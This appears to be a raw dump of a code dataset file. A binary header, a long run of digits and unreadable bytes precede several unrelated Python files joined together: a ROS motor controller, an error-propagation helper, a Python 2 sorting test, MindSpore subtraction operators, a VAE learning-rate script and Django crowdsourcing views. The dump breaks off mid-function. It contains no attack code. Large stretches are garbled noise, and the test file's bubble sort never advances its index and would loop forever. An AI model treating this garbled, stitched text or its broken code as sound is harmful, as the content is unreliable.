�����    �   huggingface�{"info": {"features": {"id": {"dtype": "string", "_type": "Value"}, "text": {"dtype": "string", "_type": "Value"}, "dataset_id": {"dtype": "string", "_type": "Value"}}}}p4���� dataset_id��������text���� id����  0:Q   �� ����+�+�@;�PP�PP�P���P8J���#*18?FMT[bipw~�����������������#*18?EMT[bjry������������������ !(.5<CJQX`gnu|������������������  '/6=DLSZahow~������������������$+3;CJQX`gov~������������������ ',4;BJQX_fmu|������������������  (/7?FMTX_fmt{������������������ &-4;BIPX_gntz������������������ %,3:AHOV]dlt{������������������    % , 3 : A H O T [ c j r y � � � � � � � � � � � � � � � � � �    ! ( 0 7 ? F M T [ c j q x ~ � � � � � � � � � � � � � � � � � �    " ) . 5 < C J Q Y ` g n t | � � � � � � � � � � � � � � � � � �     $ , 3 : A H P X _ f n v } � � � � � � � � � � � � � � � � � �    ( 0 7 ? F N U \ d k s z � � � � � � � � � � � � � � � � � � %,3:@GOU]dks{������������������ %-4<CKSZaipw~������������������ &-4<DKRY`gov}������������������  '.5<CKRYahov}������������������ &.6=DKRY`gnu|������������������  '.5<CJQX_gnu|������������������ !(08>FMT[cjqx������������������  '.6=ELSZahov~�����������������%,4;CJPV]djry������������������ "*18?FNU\cjpw~������������������#*18@GNV]djqx����������������� &-5<DKRY`gntz������������������ ")07>ELSZahow~������������������ #*18?FMT[cjqx���������������71364422695234383087493039017411688385977033119186961341907375271548093388649424746047785188766690403570821401051142386151600761867644987175775735359247337344865342815108466891510792756064653011612336715464841911916612113405021017845010961544561048435462541262132928366255280981662029127648434917888645481984661617986835361451229902632630223938392458436212273414102366179508122227461411331862900758345525603840210453019010499846381369112516859663287102149409582938511157107844051153010744728941086138145038385004482457780611325776409853912451360333086093205915515603972364447705128675902071348441765111521006846700018367937285161903203261382513713986646306663818441222841223853789490976464163203746311907994102259507294697216865914147624125320530286212902833758263243465311105454742169844536793946869120508810147475676298596218849717990100384172199351747000985055079838302306228911411012291830781819812414048890630831137258778221874270224513911069049671780867658125495508514628232024963237127111829102526091113945305069773116199281218027388184327583059106708506780350109938191038477512388885558608233334075794054101498166342629106848872791618124927004180634772557098465849410055983091196669526926685612307267480430982775822255120115104558277771655310484410139438377082714344879974602739009975214439085211143734811311023717801221503585930571324066105983178731417423503098578649047301768751712700475420849759686624371319636471102675410217248917126556852411050073497243528080402146985194600492789940116709061071573873106675318364686840427614163529669725389063351767208553106041709624668121806771222141059014112917995691311278767261779973155181757586302369250672631296751076151416921671190801327602111039721373751974006358183513639325912377616721749119816842511690126900830679091911900290377740745744582004727228121281034817875705694412797888008323863800820625175352405311739212743423246097812617255152148147069642337711149248206644401459121833101063372855906004702403162040120967265018022502053711867558659727182347492896277107447084062261200683193897211073159316989737504857224673548991263972291754224139946894419148197532705762622797612263393265528510778910115897378469594770994026160833903107329682411324370389498978480846893892819868852581417352252899365677888110337931265227365078265337684127903741316266433888259199651012577010980739686051378248415814647590336940774662918796361656079465639591109466879481931263025521357696592838396373928303727395683116941315018709452592995651835660922668615312326358120254067156954106270711082482811900693605300961527634367423477310166778042537336119030371579274115895962124224116175142379168815337377236216854883102153652964718278686585743789509147643030617843699981065656831195338530251811210451861524984774007052408114006134675585449609941501919739991028233628698865057441028999111025410734392376248481065608022152446189187750091231405503143860639541312405103808246634994617453085037061574861020815678990026639174846613485055876681080131917792820669307110633756766209417998511736628239690419579589294050290703094398615705909213393094205791279705313749401935555349018910319761424125513784826749315262228111504667117802776034680948578212511746102325319421108126180195124248293016610538830122405021128769490873377034587102566191498891581372792803897323840806145636926391839115503031007776093477278167821724878282297240417811679610101247854409924127652477227989113360979432648652309310548201563851812160802997533669686661263192853372671647364427568125649954659601023781512259710517005611072961359317714713442798596263107368503924821144190010464101114575615119068105191621683333608230558093234443667543377072079395879031219766634293412785004548470590065821248834312242511465306030485718438666765463312036393124024185067345234017867864008111756100629996889361670502106824335654907492570168024691904532678104068506684778650969624325813831143861228369512691091066668819038081248030012859962196414278887301228990614563234555221574974387955218910199674754924569921268255311956428455649369347470042882371113855031242361385394373885374720040659459824015498829317795637125857423528769652985217887281105893388776986721244107795291201468353805942080525482657274465514031677123958174339183397936180081431580864126524984765606416115213662917779649519017688554811238637750225984883351018925911169879831825183849841077003390131813949576216394340403846237862785885326252653112237997102675394339964410729688195583841870311164642215110164415798431805294654631251462016795658958423783424895551241217177146717712512793880105398764128095789707052357454970731475423611009838330474482386036192143885321011889700175847032715578857608115144981051895885711804564021643745563896654913834933868026229668740203983067815175206988418930482897034289098957122015571254984868658742854389806169413393660817211049525092633818735821546628867463561026969835460434283567980442953476108792301007324154254684973369587736952377771426848701477930822298679841264322610998928240456091814933528757939582574311564630352853167010864926797574294502636556879667961312390275483265916496641077893211773209696951284806893143887433162983091687670795213680921936636997743233295310225349116595862331841266480919450622862588338825311116116646358534736537003915155414575647915439961490537884133599007276016941126822662777242770341754271900541545994061774147827128020029885614642241176578076217364968603363611252324119385189279810513542482791221157922070743521239550778835346427388829113815989781986142717423783682041025279115326341045113135824855360975604975456636167121556671574829584831140545711341667944291210386032659938147677714788101105642573695982664819492356381035594594178751392001364732212831822239426012566523687554256218389727332161909756566855138123632593065416126244806111247111018058338644128165301237261963560568877711446630762232837759263773075971207452673343548421103088891070039276050351146565010480315823714867831961037933510174654928551648623515340340342548010217797118457063521895388372984190775964421266071706697468701560465887096526124559771245531437072719813494415721052864282663936310927395581261922189335776181088422684639993379211960501128169142414386367411798884684118051802820352383834160471108988324006286437420810253568148298995969049006494515142305913943387787834062390362683694729172126233194793391812610308541068507038610784579126134231286168383360281001773649731425418042114316171143921328962413071473115940737381516585884348533801019646824360521239672168436515690339991789557952202290908860325863908311763010347058881432413586541406132103750688793031043415635235478001154100240984937371923929478913716250620113432577368039116297901125542213487925435031118376723181045622472450283673469542815840976303327584472837035457972845244806337695461398091536550101649475038601242159646676875399103953797955282561286341624035792293713819012624509212419504711135511849627974941810689148119795399326065274868131378014075135852239114238283691143752675948153804202523528590694302797823936971135271454811137640465575656262445970824834174081124794812842555538914376121674735384078961330585844907977380074495380998514027437356486282974504102571194�,�(�1;7�=3DQ�M�b),�=t>�^�c/d�v|ӂ����v���n(X357�>�A}X�hL~�������>���I���)�r Ѝ �� d� › ݸ ҹ �� �� � hg%b�/�8�<XM�_�j��f�[���*���� ]�W#WYfs vg{N}����k���/�8�� 5#~&mB%`�i�l�z����|�8��}��G�]���S� �A&@=i>�F�UEb]u���~�O������̶ʻ��0�]�I�����$���K���L��yZ�7�����������څ�����=&�E�F�����Y���"����{U Y$i8jhzl|ـ��=�]�"��z%� �'�(:8�;�@\n^�dSf�o�~������R����G����Q���<� �)6<;DG0W�Y"\�r>~ ���Զ��I�������J���/g0�6�o.�q��WeXi^�0��?����.�O���)#+�/c2�5�:?E}T�Y�^w����������9$: D4Qc�h@rԸD�k�� 6k6�[\\�v���5 �E %K �K �K �f i �p v� 0� p� ¹ �� �� �� �� $� � �!!� !�3!�8!�A!�f!j!bn!�p!Or!ou!�!ߐ!Ϡ!7�!�!��!��!��!��!��!��!�"�"� "�"�"l'"kH"�H"j"�p"�r"�t"?w"O|"�}"O�"�"S�"��"o�"L�"K�"N�"�"��"m�"O#B #�#�#,#0#7#q #J\#�a#nr#`y#h#N�#*�#~�#+�#מ#��#y�#��#@�#��#��#��#��#P�#K$�$.$�$s${$U$hF$oJ$+W$�Y$P[$p%R)%(6%�<%�e%�q%�x%�z%Ŋ%)�%��%@�%��%��%��%E &3$&�'&�(&�-&I6&jD(�D(�Y(�i(m(�o(�r(�s(ku(m�(~)p)�)�)�)7)�!)")&)�1)2)i5)�@)�])s�)c�)�)��)�)̺)Ļ)�)��){�)K>*�>*�R*5r*��*��*e�*��*2�*��*�+f"+c(+{*+.W+�d+�h+Tm+�m+_p+4s+ds+�u+ v+��+�+E�+�+%�+�+�,�[, n,�|,�~,ѓ,̔,��,��,ϟ,U�,��,O�,N�,;�,1*-3;-�>-�L-��-W�-��-��->�-(�-��-��-��-S�-y�-�-��-o�-��-(�-��-g�-+1.Y3.*X.�X.BZ.�n.1r._u.{.�.��.��.��.��.t/�v/~/��/U�/�/�/O�/�/>�/�/Z�/�0,W0 b0A}0b�0t�0e�0��0��0[�0��0��0��0d�01�_1�n1�1��1��1�2<2^#2�22Ȏ2��2N�29�2Q�2��2-�2��2x�2F�2X�2�:4*�4��4&�4O�4i"5365395fD5_R5�o5N�5��5s�5��5i�5�<6�<6�K6�O6Ng6=j6s 7�07�:7�C7�I7|K7rM7FQ7�U7Ca7mk7�w7]�7��7�7p�71�7�7��7�8E 8 8f 8�8H!8�)8�48�B8�J81N8z`8�y8�8ۅ8ތ8��8"�8>�8 �8@�8]�8�8F9L9�9#9Z-9Z891:9I=9�=9�O9�T9Ua9t9+�9��9g�9��9�9��9֛9?�9��9�9Y�9n�9�(:�8:�E:'G: R:�i:)n:��:��:��:B�:�:.�:��: ;w;@;t ;";�O;P];il;��;�;w�;U<��<��<O�<q�<t�<��<��<P�<f�<��<�+=�,=i.=�0=-1=24=Y7=�8=�:=�Q=S=�T='W=�[=[_=}e=�g=�=;�=��=t�=��=��=��=��=�r> t>x�>ۋ>Y�>��>��>z�>9�>��>�>�>��>w�>e�>`�>�?.L?�Q?�S?Q�?�?L�?�?��?M�?��?Y�?�?;�?�?��?��?�@�@6@�1@�`@^a@�i@ފ@r�@��@��@U�@M�@�@��@�@��@��@�@�A Ah9A#;A0B�2B�8B�9B@BJBMJBPB�bB�dB�qB�zB�{B��B��B��B��B��B��B��BB�Bv�B��B��B�CT!C�*Cu+C�5C46C=SC�aCvCKvC�{CL�C��C��C��Co�C͊D&�Dj�D/�DK�D��D�-E�=E�AE�CE)OE�eE�~E܀E��EU�E��E� F� FX"F�4FRSF@rF�}FK�FсF.�F"�F׹F�F]�F�G�G G�G�#GY�GD�GT�G�GV�Gg�GW"H�,H�;HaH�aH+iHQlH�qH�vH�wH��H΂H��H�H3�Hm�H��H��H��H��H��H0�H��H}�Hb�H��H�$I�I��I��I��I��I��I��I*J�J�JGJ,JnJ�J�J�=0 and pos[1]+10 #! /usr/bin/env python import rospy import serial from geometry_msgs.msg import Twist class MotorControl(object): def __init__(self): self.port = rospy.get_param("~port", "/dev/ttyUSB0") self.baudrate = long(rospy.get_param("~baud", "115200")) self.cmdTopic = rospy.get_param("~cmd_topic", "cmd_vel") self.wheelSep = float(rospy.get_param("~wheel_separation", "0.46")) self.wheelRad = float(rospy.get_param("~wheel_radius", "0.08255")) try: self.serial = serial.Serial(self.port, self.baudrate, timeout=10) rospy.loginfo("Connect to port: " + self.port + " success!!") except Exception as e: rospy.logerr("Cannot connect to port: " + self.port) rospy.logerr("Error: " + str(e)) self.sub_cmd = rospy.Subscriber( self.cmdTopic, Twist, self.cmdvelCB, queue_size=10) self.goal_trans_x = 0.0 self.goal_rotat_z = 0.0 self.vel_wheel_l = 0.0 self.vel_wheel_r = 0.0 @staticmethod def constrain(value, value_min, value_max): return max(min(value_max, value), value_min) def cmdvelCB(self, msg): self.goal_trans_x = msg.linear.x self.goal_rotat_z = msg.angular.z WL = (self.goal_trans_x - self.wheelSep / 2.0*self.goal_rotat_z)/self.wheelRad WR = -(self.goal_trans_x + self.wheelSep / 2.0*self.goal_rotat_z)/self.wheelRad lWL = self.constrain(int(WL*10) & 0xFF, 0, 255) lWR = self.constrain(int(WR*10) & 0xFF, 0, 255) command = [255, lWR, lWL, 254] if self.serial != None: self.serial.write(command) if __name__ == "__main__": try: rospy.init_node("test_motor_protocal") rospy.loginfo("Eleven test motor controller ...") robot = MotorControl() while not rospy.is_shutdown(): try: if robot.serial.readable(): try: if robot.serial.read() == b'\xff': byte = ord(robot.serial.read()) vel_wheel_r = (256-byte) * \ (-1/10.0) if byte > 127 else byte/10.0 byte = ord(robot.serial.read()) vel_wheel_l = (256-byte) * \ (-1/10.0) if byte > 127 else byte/10.0 robot.serial.read() robot.vel_wheel_l = vel_wheel_l robot.vel_wheel_r = vel_wheel_r comm = ">>> {}, {}".format(robot.vel_wheel_r,robot.vel_wheel_l) rospy.loginfo(comm) except Exception: pass except KeyboardInterrupt: pass except rospy.ROSInterruptException: passimport sys import math class Datapoints(object): def __init__(self, data = None): self._values = {} self._deviations = {} if data is not None: self.addData(data) def addDatapoint(self, param, value, dev): self._values[param] = value self._deviations[param] = dev def addData(self, data): for param in data.iterkeys(): self[param] = data[param] def params(self): return self._values.iterkeys() def values(self): return DictView(self._values) def deviations(self): return DictView(self._deviations) def __getitem__(self, param): return self._values[param], self._deviations[param] def __setitem__(self, param, datapoint): value, deviation = datapoint self.addDatapoint(param, value, deviation) def __iter__(self): for param in self.params(): value, deviation = self[param] yield param, value, deviation class DictView(object): def __init__(self, data): self.data = data def __getitem__(self, index): return self.data[index] def ErrorBars(f, data): deviations = (CalcDeviation(f, data, p) for p in data.params()) result = math.fsum(dev ** 2 for dev in deviations) return math.sqrt(result) def CalcDeviation(f, data, parameter): derivative = CalcDerivative(f, data, parameter) return derivative * data._deviations[parameter] # Used in CalcDerivative to calculate the optimal value of h. InitH = math.pow(sys.float_info.epsilon, 1.0 / 3) def CalcDerivative(f, data, parameter): paramValue = data._values[parameter] # Numerical differentiation via two-sided difference quotient # Special thanks to # Paper: http://www.karenkopecky.net/Teaching/eco613614/Notes_NumericalDifferentiation.pdf hPrime = InitH * max(abs(paramValue), 1) h = ((paramValue + hPrime) - (paramValue - hPrime)) / 2 rightValue = ModifyAndExecute(f, data, parameter, paramValue + h) leftValue = ModifyAndExecute(f, data, parameter, paramValue - h) return (rightValue - leftValue) / (2 * h) def ModifyAndExecute(f, data, param, paramValue): origValue = data._values[param] data._values[param] = paramValue retVal = f(data.values()) data._values[param] = origValue return retVal agancsos/pythontestClass.py #!/bin/python import random class MYCLASS: id=""; title=""; text=""; def __init__(self): self.id=int(random.random()*999999); self.title="DEFAULT"; self.text="DEFAULT"; def pad(self,string,length,char): i=len(string); final=""; while i <= length: final+=char; i+=1; return string + final; def printReg(self): print self.pad(str(self.id),20," ") , self.pad(self.title,20," ") , self.pad(self.text,40," "); def sort(list): n=len(list); swapped_flag=1; while swapped_flag!=0: swapped_flag=0; i=1; while i < n-1: if list[i-1].id > list[i].id: temp=list[i-1]; list[i-1]=list[i]; list[i]=temp; swapped_flag=1; n=n-1; return list; ##int main temp_class=MYCLASS(); class_array=[]; i=0; while i < 10: class_array.append(MYCLASS()); i+=1; print "Before: "; print temp_class.pad("ID",20," ") , temp_class.pad("TITLE",20," ") , temp_class.pad("TEXT",40," "); print temp_class.pad("=",80,"="); for objects in class_array: objects.printReg(); print temp_class.pad("=",80,"="); class_array=sorted(class_array,key=lambda key:key.id); print "After: "; print temp_class.pad("ID",20," ") , temp_class.pad("TITLE",20," ") , temp_class.pad("TEXT",40," "); print temp_class.pad("=",80,"="); for objects in class_array: objects.printReg(); print temp_class.pad("=",80,"="); # Copyright 2020 Huawei Technologies Co., Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ """Implementation for internal polymorphism `sub` operations.""" from ...composite import base from ... import functional as F sub = base.MultitypeFuncGraph("sub") """ `sub` is a metafuncgraph object which will compute the subtraction of two objects using ".register" decorator. """ @sub.register("Number", "Number") def _sub_scalar(x, y): """Returns x - y where x and y are all scalars.""" return F.scalar_sub(x, y) @sub.register("Tensor", "Tensor") def _sub_tensor(x, y): """Returns x - y where x and y are all tensors.""" return F.tensor_sub(x, y) @sub.register("Number", "Tensor") def _scalar_sub_tensor(x, y): """Returns x - y where x is a scalar and y is a tensor. x and y should have same dtype.""" return F.tensor_sub(x, y) @sub.register("Tensor", "Number") def _tensor_sub_scalar(x, y): """Returns x - y where x is a tensor and y is a scalar. x and y should have same dtype.""" return F.tensor_sub(x, y) 1-10 # -*- coding: utf-8 -*- """ Created on Thu Oct 4 12:06:24 2018 @author: Based off: https://github.com/kanojikajino/grammarVAE Paper: https://arxiv.org/abs/1703.01925 """ from time import time import numpy as np from generateData import H5DataGenV2, getCacheSize from GVAE import smilesGVAE from findLR_CLR import LRFinder if __name__ == "__main__": k = 25000 gpus = 1 pth = 'data/6MZincHV2/' #for data fn = f'data/FindLR_{int(time())}' #for model save print('Path:',pth) print('Model save:',fn) n = getCacheSize(pth) indices = np.arange(n) idTrain = indices[0:k] idValid = indices[k:k+4000] idTest = indices[k+4000:k+6000] batch = 256 * gpus genr = H5DataGenV2(idTrain,batch,pth=pth) vgenr = H5DataGenV2(idValid,batch,pth=pth) tstgen = H5DataGenV2(idTest,2000,pth=pth) XTE, _tmp = tstgen.__getitem__(0) del _tmp, tstgen params = { 'LATENT':56, 'nC':3, 'nD':3, 'beta':1.0, 'gruf':501, 'ngpu':gpus, 'opt':'SGD', 'wFile':None } EPO = 2 lr_finder = LRFinder(min_lr=2.0e-4, max_lr=1.0e-2, steps_per_epoch=np.ceil(k/batch), epochs=EPO) sgv = smilesGVAE(**params) print('Training autoencoder.') if sgv.mgm is None: sgv.aen.fit_generator(generator=genr, validation_data=vgenr, use_multiprocessing=False, callbacks = [lr_finder],epochs=EPO) else: sgv.mgm.fit_generator(generator=genr, validation_data=vgenr, use_multiprocessing=False, callbacks = [lr_finder],epochs=EPO) lr_finder.plot_loss() lr_finder.plot_lr() from django.core.files import locks from django.core.urlresolvers import reverse from django.db.models import Count, F, Q, Min from django.template import RequestContext, TemplateDoesNotExist from django.template.loader import get_template, select_template from django.utils import timezone from django.views.decorators.clickjacking import xframe_options_exempt from django.views.decorators.csrf import csrf_exempt from django.views.decorators.http import require_GET, require_POST from django.http import HttpResponse, Http404, HttpResponseBadRequest from datetime import datetime from base64 import b64encode import pytz import json import os import logging import random import uuid import numpy as np from basecrowd.interface import CrowdRegistry from basecrowd.models import TaskGroupRetainerStatus from basecrowd.models import RetainerPoolStatus from basecrowd.tasks import gather_answer logger = logging.getLogger('crowd_server') @require_POST @csrf_exempt def create_task_group(request, crowd_name): """ See README.md for API. """ # get the interface implementation from the crowd name. interface, model_spec = CrowdRegistry.get_registry_entry(crowd_name) # Response dictionaries correct_response = {'status': 'ok'} wrong_response = {'status': 'wrong'} # Parse information contained in the URL json_dict = request.POST.get('data') # Validate the format. if not interface.validate_create_request(json_dict): wrong_response['reason'] = 'Invalid request data.' return HttpResponse(json.dumps(wrong_response)) # Pull out important data fields json_dict = json.loads(json_dict) configuration = json_dict['configuration'] group_id = json_dict['group_id'] group_context = json.dumps(json_dict['group_context']) content = json_dict['content'] point_identifiers = content.keys() # Create a new group for the tasks. if model_spec.group_model.objects.filter(group_id=group_id).exists(): wrong_response['reason'] = 'Group id %s is already in use.' % group_id return HttpResponse(json.dumps(wrong_response)) current_group = model_spec.group_model( group_id=group_id, tasks_finished=0, callback_url=configuration['callback_url'], group_context=group_context, crowd_config=json.dumps(configuration.get(crowd_name, {})), global_config=json.dumps(configuration)) # Call the group hook function, then save the new group to the database. interface.group_pre_save(current_group) current_group.save() # Build crowd tasks from the group if 'retainer_pool' in configuration: # Retainer pool tasks # The specified crowd must support retainer pools retainer_pool_model = model_spec.retainer_pool_model if not retainer_pool_model: wrong_response['reason'] = 'Crowd does not support retainer pools.' return HttpResponse(json.dumps(wrong_response)) # Create or find the retainer pool. retainer_config = configuration['retainer_pool'] create_pool = retainer_config['create_pool'] pool_id = retainer_config.get('pool_id', '') if create_pool: (retainer_pool, created) = retainer_pool_model.objects.get_or_create( external_id=pool_id, defaults={ 'capacity': retainer_config['pool_size'], 'status': RetainerPoolStatus.RECRUITING, }) if created == False: # pool id already taken wrong_response['reason'] = 'Pool id %s already in use' % pool_id return HttpResponse(json.dumps(wrong_response)) else: try: retainer_pool = retainer_pool_model.objects.get( external_id=pool_id) # TODO: Make sure this pool is compatible with the new task group except retainer_pool_model.DoesNotExist: # clean up current_group.delete() wrong_response['reason'] = 'Pool %s does not exist' % pool_id return HttpResponse(json.dumps(wrong_response)) current_group.retainer_pool = retainer_pool # Don't call interface.create_task, the `post_retainer_tasks` celery # task will do so. # Batch and create the tasks. batch_size = configuration['task_batch_size'] for i in range(0, len(point_identifiers), batch_size): batch_point_ids = point_identifiers[i:i+batch_size] batch_content = { j: content[j] for j in batch_point_ids } task_id = str(uuid.uuid4()) # generate a random id for this task task = model_spec.task_model( task_type=configuration['task_type'], data=json.dumps(batch_content), create_time=timezone.now(), task_id=task_id, group=current_group, num_assignments=configuration['num_assignments'], is_retainer=True, ) interface.task_pre_save(task) task.save() #for point_id, point_content in content.iteritems(): # task_id = str(uuid.uuid4()) # generate a random id for this task # task = model_spec.task_model( # task_type=configuration['task_type'], # data=json.dumps({point_id: point_content}), # create_time=pytz.utc.localize(datetime.now()), # task_id=task_id, # group=current_group, # num_assignments=configuration['num_assignments'], # is_retainer=True, # ) # interface.task_pre_save(task) # task.save() # start the work right away if the pool is ready if retainer_pool.status in [RetainerPoolStatus.IDLE, RetainerPoolStatus.ACTIVE]: current_group.retainer_pool_status = TaskGroupRetainerStatus.RUNNING retainer_pool.status = RetainerPoolStatus.ACTIVE retainer_pool.save() else: current_group.retainer_pool_status = TaskGroupRetainerStatus.WAITING current_group.save() else: # Not retainer, create a task for each batch of points. for i in range(0, len(point_identifiers), configuration['task_batch_size']): # build the batch current_content = {} for j in range(i, i + configuration['task_batch_size']): if j >= len(point_identifiers): break current_content[point_identifiers[j]] = content[ point_identifiers[j]] current_content = json.dumps(current_content) # Call the create task hook current_task_id = interface.create_task(configuration, current_content) # Build the task object current_task = model_spec.task_model( task_type=configuration['task_type'], data=current_content, create_time=pytz.utc.localize(datetime.now()), task_id=current_task_id, group=current_group, num_assignments=configuration['num_assignments']) # Call the pre-save hook, then save the task to the database. interface.task_pre_save(current_task) current_task.save() return HttpResponse(json.dumps(correct_response)) # Delete all tasks from the system. def purge_tasks(request, crowd_name): interface, model_spec = CrowdRegistry.get_registry_entry(crowd_name) tasks = model_spec.task_model.objects.all() # Call the delete hook, then delete the tasks from our database. # TODO: clean up retainer pool tasks correctly. interface.delete_tasks(tasks) tasks.delete() return HttpResponse('ok') # we need this view to load in AMT's iframe, so disable Django's built-in # clickjacking protection. @xframe_options_exempt @require_GET def get_assignment(request, crowd_name): # get the interface implementation from the crowd name. interface, model_spec = CrowdRegistry.get_registry_entry(crowd_name) logger.info('Non-retainer worker requested task assignment.') # get assignment context context = interface.get_assignment_context(request) try: interface.require_context( context, ['task_id', 'is_accepted'], ValueError('Task id unavailable in assignment request context.')) except ValueError: # This task is no longer available (due to a race condition). # Return the 'No available tasks' template. template = get_scoped_template(crowd_name, 'unavailable.html') return HttpResponse(template.render(RequestContext(request, {}))) return _get_assignment(request, crowd_name, interface, model_spec, context) def _get_assignment(request, crowd_name, interface, model_spec, context, **custom_template_context): # Retrieve the task based on task_id from the database try: current_task = (model_spec.task_model.objects .select_related('group') .get(task_id=context['task_id'])) task_group = current_task.group except model_spec.task_model.DoesNotExist: response_str = '''

Error: Expired Task!

Task %s has expired, and isn't currently available for work. Please return this task and pick up a new one.

''' % context['task_id'] return HttpResponse(response_str) # Save the information of this worker worker_id = context.get('worker_id') if worker_id: try: current_worker = model_spec.worker_model.objects.get( worker_id=worker_id) except model_spec.worker_model.DoesNotExist: current_worker = model_spec.worker_model( worker_id=worker_id) # Call the pre-save hook, the save to the database interface.worker_pre_save(current_worker) current_worker.save() else: current_worker = None is_accepted = context.get('is_accepted', False) # If this is a retainer task, add the worker to the pool (if the worker # isn't already in the pool, i.e., they're trying to accept multiple HITs # for the same pool). if current_task.task_type == 'retainer': # TODO: consider making this all pools (i.e., a worker can't be in # more than one pool at a time). pool = task_group.retainer_pool if ((pool.active_workers.filter(worker_id=worker_id).exists() or pool.reserve_workers.filter(worker_id=worker_id).exists()) and (current_worker.assignments.filter( task__group__retainer_pool=pool, task__task_type='retainer') .exclude(task=current_task).exists())): response_str = '''

Error: Multiple pool memberships detected

You can't accept more than one retainer task at a time, and we've detected that you are already active in another retainer task.

Please return this task, or leave the pool in your other active task.

Note: You may see this error if you have recently finished another retainer task. In that case, simply wait 5-10 seconds and refresh this page, and the error should be gone.

''' return HttpResponse(response_str) global_config = json.loads(task_group.global_config) retainer_config = global_config['retainer_pool'] exp_config = global_config.get('experimental') churn_thresh = exp_config.get('churn_threshold') if exp_config else None context.update({ 'waiting_rate': retainer_config['waiting_rate'], 'per_task_rate': retainer_config['task_rate'], 'min_required_tasks': retainer_config['min_tasks_per_worker'], 'pool_status': pool.get_status_display(), }) # Relate workers and tasks (after a worker accepts the task). if is_accepted: if not current_worker: raise ValueError("Accepted tasks must have an associated worker.") assignment_id = context['assignment_id'] try: assignment = current_worker.assignments.get(assignment_id=assignment_id) except model_spec.assignment_model.DoesNotExist: assignment = model_spec.assignment_model.objects.create( assignment_id=assignment_id, worker=current_worker, task=current_task) # Add the new worker to the session task's retainer pool. if current_task.task_type == 'retainer': # Put the worker on reserve if the pool is full and we're churning if pool.active_workers.count() >= pool.capacity and churn_thresh is not None: assignment.on_reserve = True else: assignment.on_reserve = False current_worker.pools.add(pool) assignment.save() context.update({ 'wait_time': assignment.time_waited, 'tasks_completed': current_worker.completed_assignments_for_pool_session( current_task).count(), 'understands_retainer': current_worker.understands_retainer, }) else: if not current_task.group.work_start_time: current_task.group.work_start_time = timezone.now() current_task.group.save() # Add task data to the context. content = json.loads(current_task.data) group_context = json.loads(task_group.group_context) crowd_config = json.loads(task_group.crowd_config) context.update(group_context=group_context, content=content, backend_submit_url=interface.get_backend_submit_url(), frontend_submit_url=interface.get_frontend_submit_url(crowd_config), crowd_name=crowd_name) context.update(**custom_template_context) # Load the template and render it. template = get_scoped_template(crowd_name, current_task.task_type + '.html', context=context) return HttpResponse(template.render(RequestContext(request, context))) def get_scoped_template(crowd_name, template_name, context=None): base_template_name = os.path.join(crowd_name, 'base.html') if context is not None: try: t = get_template(base_template_name) except TemplateDoesNotExist: base_template_name = 'basecrowd/base.html' context['base_template_name'] = base_template_name return select_template([ os.path.join(crowd_name, template_name), os.path.join('basecrowd', template_name)]) # When workers submit assignments, we should send data to this view via AJAX # before submitting to AMT. @require_POST @csrf_exempt def post_response(request, crowd_name): # get the interface implementation from the crowd name. interface, model_spec = CrowdRegistry.get_registry_entry(crowd_name) # get context from the request context = interface.get_response_context(request) # validate context interface.require_context( context, ['assignment_id', 'task_id', 'worker_id', 'answers'], ValueError("Response context missing required keys.")) # Check if this is a duplicate response assignment_id = context['assignment_id'] if model_spec.assignment_model.objects.filter( assignment_id=assignment_id, finished_at__isnull=False).exists(): return HttpResponse('Duplicate!') # Retrieve the task and worker from the database based on ids. current_task = model_spec.task_model.objects.get(task_id=context['task_id']) assignment = model_spec.assignment_model.objects.get(assignment_id=assignment_id) # Store this response into the database assignment.content = context['answers'] assignment.finished_at = timezone.now() interface.response_pre_save(assignment) assignment.save() # Check if this task has been finished # If we've gotten too many responses, ignore. if (not current_task.is_complete and (current_task.assignments.filter(finished_at__isnull=False).count() >= current_task.num_assignments)): current_task.is_complete = True current_task.pre_celery = timezone.now() current_task.save() gather_answer.delay(current_task.task_id, model_spec) # terminate in progress retainer tasks (model_spec.assignment_model.objects .exclude(task__task_type='retainer') .filter(task=current_task, finished_at__isnull=True) .update(finished_at=timezone.now(), terminated=True)) return HttpResponse('ok') # AJAX call succeded. # Views related to Retainer Pool tasks ####################################### @require_POST @csrf_exempt def ping(request, crowd_name): try: interface, model_spec = CrowdRegistry.get_registry_entry(crowd_name) now = timezone.now() # get and validate context context = interface.get_response_context(request) interface.require_context( context, ['task_id', 'worker_id', 'assignment_id'], ValueError("ping context missing required keys.")) task = model_spec.task_model.objects.get(task_id=context['task_id']) worker = model_spec.worker_model.objects.get(worker_id=context['worker_id']) assignment = model_spec.assignment_model.objects.get( assignment_id=context['assignment_id']) pool_status = task.group.retainer_pool.get_status_display() terminate_work = False terminate_worker = assignment.worker_released_at is not None # update waiting time ping_type = request.POST['ping_type'] # Task started waiting, create a new session if ping_type == 'starting': assignment.finish_waiting_session() # Task is waiting, increment wait time. elif ping_type == 'waiting' and pool_status != 'finished': last_ping = assignment.last_ping time_since_last_ping = (now - last_ping).total_seconds() assignment.time_waited_session += time_since_last_ping # Task is working, verify that the assignment hasn't been terminated. elif ping_type == 'working': active_task_id = request.POST.get('active_task', None) if not active_task_id: logger.warning('Ping from %s, but no active task id.' % assignment) terminate_worker = False # Don't kill them if we don't know what they're working on else: try: active_assignment = model_spec.assignment_model.objects.filter( worker=worker, task_id=active_task_id)[0] if active_assignment.terminated: terminate_work = True except IndexError: # No active assignment terminate_worker = False # Don't kill the worker if we don't know what they're working on. # if terminate_worker: # make sure their current task can be recycled # active_assignment.finished_at = now # active_assignment.terminated = True # active_assignment.save() assignment.last_ping = now assignment.save() worker.last_ping = now worker.save() logger.info('ping from worker %s, task %s' % (worker, task)) retainer_config = json.loads(task.group.global_config)['retainer_pool'] data = { 'ping_type': ping_type, 'wait_time': assignment.time_waited, 'tasks_completed': worker.completed_assignments_for_pool_session( task).count(), 'pool_status': pool_status, 'waiting_rate': retainer_config['waiting_rate'], 'per_task_rate': retainer_config['task_rate'], 'min_required_tasks': retainer_config['min_tasks_per_worker'], 'terminate_work': terminate_work, 'terminate_worker': terminate_worker, } return HttpResponse(json.dumps(data), content_type='application/json') except Exception as e: logger.exception(e) raise e @require_GET def assign_retainer_task(request, crowd_name): try: # get the interface implementation from the crowd name. interface, model_spec = CrowdRegistry.get_registry_entry(crowd_name) context = interface.get_response_context(request) interface.require_context( context, ['task_id', 